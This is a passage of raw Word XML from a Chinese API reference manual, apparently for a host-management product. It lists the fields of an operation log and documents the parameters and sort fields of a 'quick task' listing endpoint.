            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CCBC7AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50B810C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>所属子功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="47A2C094" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="126C6960" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>requestIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6413519A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="542E76F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15967211" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>请求</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6447A1FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49C2D5C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="528F9E89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AC1E1E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B046FF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>请求来源区域</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1CECC937" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B1DF8D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>requestId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37DF5393" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D960C97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="506DBCB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>请求id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52572A08" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F00092" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>requestParam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C52C6B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E9E46FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7915BF41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>请求参数，为</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="261D7A82" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74F453D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C413E43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DFE848E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38300ADC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>帐号</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D2699DA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F185DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73A9A223" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DBE08A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E5EFD43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>帐号</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>类型 1-主</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>帐号</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2-子</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>帐号</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="442B63C6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CE927F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>responseCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17AF44F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F5728D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18385541" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>响应码 和http返回</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>码相同</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 200-成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2AA78638" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F9F6F81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32859A21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A76BDE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48601F8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>错误描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4351D8B8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77D4E0F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eventTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CC66C25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="232FA52E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E0921A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发生时间 为秒级时间戳格式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35F3ECA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="379" w:name="_Toc115166262"/>
      <w:bookmarkStart w:id="380" w:name="快速任务"/>
      <w:bookmarkEnd w:id="378"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>快速任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="379"/>
    </w:p>
    <w:p w14:paraId="69C99189" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="381" w:name="_Toc115166263"/>
      <w:bookmarkStart w:id="382" w:name="获取快速任务检测项列表"/>
      <w:r>
        <w:t>获取快速任务检测项列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="381"/>
    </w:p>
    <w:p w14:paraId="74E125AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6FA082" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/task/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="616D97D5"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2096"/>
        <w:gridCol w:w="2086"/>
        <w:gridCol w:w="3039"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E3D63F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466A2EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3084D15C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="726094E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32475520" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1431EDB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A78D18E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="680C1325" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>； 2：windows (必填)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5760B2E4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75996891" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="194D6882" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49AEF102" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="757EACC1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33BBB483" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4308DDB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="462E339B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="08C96054" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B65416" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>categories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48C4A017" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A3E72DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="082419F8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30813A67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updatedTimeRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68AA4A9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Map&lt;String, String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67FDA15B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C0506DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>排序字段</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1484"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="13E9CF4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7E599AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E44E3F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6CD799BA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BC17CC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18DCE205" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="791297B9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26317274" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5200859C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
